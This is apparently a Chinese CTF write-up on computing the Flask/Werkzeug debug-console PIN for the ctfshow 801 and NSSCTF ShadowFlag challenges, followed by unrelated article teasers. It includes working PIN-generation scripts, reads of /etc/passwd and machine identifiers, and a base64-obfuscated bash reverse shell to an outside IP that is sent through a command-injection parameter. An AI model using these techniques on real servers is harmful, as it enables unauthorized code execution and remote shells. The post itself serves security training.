flask计算pin码

news2025/2/25 13:53:33

Flask debug模式算pin码_Ys3ter的博客-CSDN博客_flask pin码

可以参考这个链接

ctfshow801

然后这张图非常的重要

 也就是我们需要上面的各个因素,然后获得ping码,也就是console的密码,就可以自己输出命令

 然后会有两个脚本,一个是3.6通过md5加密,一个是3.8通过sha1进行加密

#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377585864',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    'ab5474dd-e22b-45df-8316-7ad4e11f978ae78714841cdc523ece942e68660c9777ad13a358f5ea71a8e1d1424efe9a8400'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

开始做题:

看见了绝对地址,和python3.8所以用下面的脚本计算ping码

接下来一步步获取 

/etc/passwd获得用户名

 然后别的跟着获取就行,这里注意一下这个机器id

需要进行拼接的

 这里后面都一样的所以不用多想随便取一个就行 ,然后套脚本

 

转换十进制,用谷歌的console就可以了

 

 导入os模块,这里\n是换行,差点 以为flag文件是nflag哈哈

ShadowFlag

打开界面就是源码,


from flask import Flask, request
import os
from time import sleep

app = Flask(__name__)

flag1 = open("/tmp/flag1.txt", "r")   #打开文件
with open("/tmp/flag2.txt", "r") as f:
    flag2 = f.read()   #flag2应该是flag1.txt的值
tag = False

 
@app.route("/")   #路由选择
def index():
    with open("app.py", "r+") as f://读取app.py的值,所以我们可以看见源码下面有return
        return f.read()


@app.route("/shell", methods=['POST'])#/shell路由  post传参
def shell():
    global tag    #tag全局变量
    if tag != True:  #tag为false进入
        global flag1  #flag1 为全局变量
        del flag1  #删除flag1
        tag = True   #赋值
    os.system("rm -f /tmp/flag1.txt /tmp/flag2.txt")#命令删除二个文件
    action = request.form["act"]   #获取post传参
    if action.find(" ") != -1: # 不能有空格
        return "Nonono"
    else:
        os.system(action) #这里会命令执行,应该可以利用,毕竟act可控
    return "Wow"


@app.errorhandler(404)
def error_date(error):
    sleep(5)
    return "扫扫扫,扫啥东方明珠呢[怒]"


if __name__ == "__main__":
    app.run()

所以现在我们的思路,就是post传参然后执行它

根据代码得知:二个flag文件,感觉flag分成了二段,然后一段flag1 被删除了,flag2还存在

act=echo%09YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTAuNDAuMTkzLjIwMi85OTk5IDA%2bJjE=|base64%09-d|bash

 其实这直接访问console,这一步完全没想出来,看别人也都是直接猜出来的。

 

打通发现,ctf是用户名

 

 然后转换为10进制   2485376947610

a4473a34-a602-43b3-bd38-c11e15f45ae7

 42f44ee9fdafb6557e4b39ff62e0aa5df78925533340fa7c067roaeff31dd90665

然后进行拼接得

 查看条件发现,还缺一个绝对地址

会打开所有得进程,这里也会包含,打开文件但未正常关闭,然后直接删除得一般进程号 为15-18

 

发现了flag1.txt被删除得进程,所以我们 

是当中的第三个然后进行读取 

然后这个报错页面,只要我们不是传参的act都会爆出错误,然后获得了绝对地址

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485376947675',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'e0ad2d31-1d21-4f57-b1c5-4a9036fbf23516921067cd405eaa654013ea6a0ba8784e311ba26d783724d39843827fce654f'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

 获得pin码

因为源码中的flag2未被删除直接输出就可以了

 解释一下为什么在进程里面:

flag1 = open("/tmp/flag1.txt", "r")   #打开文件
with open("/tmp/flag2.txt", "r") as f:
    flag2 = f.read()   #flag2应该是flag1.txt的值
tag = False

flag1.txt只是打开并没有关闭,而flag2.txt会进行正常的关闭,所以进程中不会出现

参考链接:GitHub - Randark-JMT/NSSCTF-Round_v7-ShadowFlag: A reverse challenge in NSSCTF Round#7

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/197823.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

原神私服搭建教程(3.0本地版)

环境准备安装Java SE – 17 注意: 如果想仅运行服务端, 只下载 jre 即可MongoDB (推荐 4.0)代理程序: mitmproxy (仅需 mitmdump;推荐使用), Fiddler Classic 等校验win r ,输入cmd 呼出控制台java:输入java -version 查看版本,正…

嵌入式Linux从入门到精通之第十二节:线程

线程类比于人得大脑,进程来实现具体操作 每个进程都拥有自己的数据段、代码段和堆栈段,这就造成进程在进行创建、切换、撤销操作时,需要较大的系统开销。 为了减少系统开销,从进程中演化出了线程。 线程存在于进程中,共享进程的资源。 线程是进程中的独立控制流,由…

【C++】C++ 入门(三)

目录 一、内联函数 1、前置知识 2、内联函数概念 3、内联函数特性 4、补充内容 4.1、宏的优缺点 4.2、C有哪些技术替代宏 二、auto关键字(C11) 1、概念 2、使用场景 3、使用细则 3.1、auto与指针和引用结合起来使用 3.2、 在同一行定义多个变量 3.3、auto不能作为…

Java安全基础(二)Servlet核心技术

因为在实习中,文章更新速度可能有点慢,初学JAVA安全,内容如有不恰当的地方,欢迎各位大佬指正。 今天写一下Servlet的一些核心技术,后面更新完Filter之后我会对这两个进行一个总结。 了解Servlet知识对后续的框架审计…

自媒体人绝对要知道的6款软件工具!免费文案、配音不在话下

NO.1丨喵盐配音(小程序) 喵盐配音,它是我近期使用次数较多的配音小程序。这是一款专注于文字转语音的智能语音合成小程序,不需要下载,v小橙序搜索在线使用。其拥有200多个抖音热门发音人,支持普通话、英语、…

更安全的ftp服务器Pure-FTP搭建(4)

实验简介 实验所属系列:Linux服务器搭建 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,计算机网络 实验时数(学分):2学时 实验类别:实践类预备知识 本实验要求实验者…

【JVM】Java类加载机制详解

【JVM】Java类加载机制详解 文章目录【JVM】Java类加载机制详解一:类加载子系统1:类加载器子系统的作用2:加载器 ClassLoader 的角色二:类的加载过程1:加载阶段2:验证阶段:确保被加载的类的正确…

[leetcode 215] 数组中的第K个最大元素

题目 题目:https://leetcode.cn/problems/kth-largest-element-in-an-array/description/ 解法 这道题目目前快排可以直接过,但是时间复杂度是 O(nlogn)O(nlogn)O(nlogn)。 想要 O(n)O(n)O(n),这就涉及到408考研知识点了😂&…

Java高手速成 | 使用TCP进行手机文件传输

由于TCP是面向流的,这意味着接收端有可能会在一次接收动作中接收两个或者多个数据包,那么当发送方需要把一个大文件分批连续发送时,如何保证接收方能够正确地接收并重修组会成一个完整的文件显得十分重要,本节通过一个端到端的手机…

每天10个前端小知识 【Day 4】

前端面试基础知识题 1. js中如何判断一个值是否是数组类型? instanceof const arr []; arr instanceof Array; // true Array.isArray const arr []; Array.isArray(arr) // true const obj {}; Array.isArray(obj) // false Object.prototype.isPrototype…

拉伯证券|A股延续强势格局 北向资金开年以来净买入超1500亿元

周四,A股商场整体延续强势格局,沪指贴合5日均线震动向上。科技板块仍是干流热点,半导体板块大面积飘红,创新药、CRO等生长赛道均涨势杰出。 到收盘,上证综指报3285.67点,涨0.02%;深证成指报1213…

初识SpringSecurity

初识SpringSecurity spring-security在spring的官网即可找到 spring-security spring-security官方文档的地址 https://docs.spring.io/spring-security/site/docs/ spring-security是Spring系列的关于安全的框架,还有一套安全的框架是Shiro 环境的搭建 项目使…

Android 播放base64音频

需求描述: 做一个Android扫码验证入场的程序: 如果验证通过,则播放一段“验证通过,请放行”的语音, 如果验证不通过,则播放其他的语音提示。 实现步骤: 1.要播放语音提示,先要有…

8个你可能不知道答案的常见JavaScript面试问题

不管你喜不喜欢,棘手的问题仍然会被野外的面试官问到。 原因是,这些问题可以告诉你很多关于你对语言的核心理解,因此你是否适合这份工作。 这些问题中涉及的常见概念包括: Hoisting关闭范围值与引用类型原型继承 今天我们要一石…

AC自动机详解

更好的阅读体验\color{red}{更好的阅读体验}更好的阅读体验 文章目录前置知识字典树 Trie支持操作建字典树实现思想代码实现例题Trie字符串统计最大异或对AC自动机基础概念实现思想代码实现例题搜索关键词单词前置知识 字典树 Trie Trie 是一种能够快速插入和查询字符串的多叉树…

成功解决yum安装的php版本过低的问题

文章目录前言一. 问题复现二. 问题分析三. 问题解决:四. 重要补充1. yum-config-manager介绍2. yum-uitls介绍3. remi资源库总结前言 大家好,我是沐风晓月,日常学习过程经常会遇到一些奇奇怪怪的问题,而解决问题就成了常态&#…

鸿蒙开发学习|HarmonyOS工程介绍

系列文章目录 第一章 HarmonyOS是什么 第二章 基础环境和开发工具 文章目录系列文章目录前言一、HarmonyOS工程介绍二、工程目录结构三、工程目录介绍1.entry2.Ability3.库文件4.资源文件5.配置文件6.pack.info7.HAR总结前言 本文将会给大家梳理 HarmonyOS 源码目录结构&…

关于《利用LexYacc进行词法分析和语法分析并生成语法树》

利用Lex&Yacc进行词法分析和语法分析 写在前面 利用Lex进行词法分析的流程在前面已经讲过,接下来是利用Lex&Yacc进行语法分析,最后可视化生成语法树。具体的操作视频:https://www.bilibili.com/video/BV1wY411q7aH/ 语法分析流程 …

【MySQL】MySQL 8.0 新特性之 - 窗口函数(Window Functions)

窗口函数 - Window Functions1. 定义1.1 窗口函数1.2 语法格式2. 分类2.1 序号函数2.1.1 row_number()2.1.2 rank()2.1.3 dense_rank()2.2.4 示例2.2 分布函数2.2.1 percent_rank()2.2.2 cume_dist()2.3 前后函数2.3.1 lag(expr, n, default)2.3.2 lead(expr, n, default)2.3.3…

致跟我一样苦恼的你们

2023年2月1日,我决定结束实习,回去准备春招和毕设。我把这个决定跟家人和朋友说时,他们似乎是有点不太赞同,他们觉得: “现在工作不好找,你可以先找好下一家公司后再选择离职” “毕设得事情,…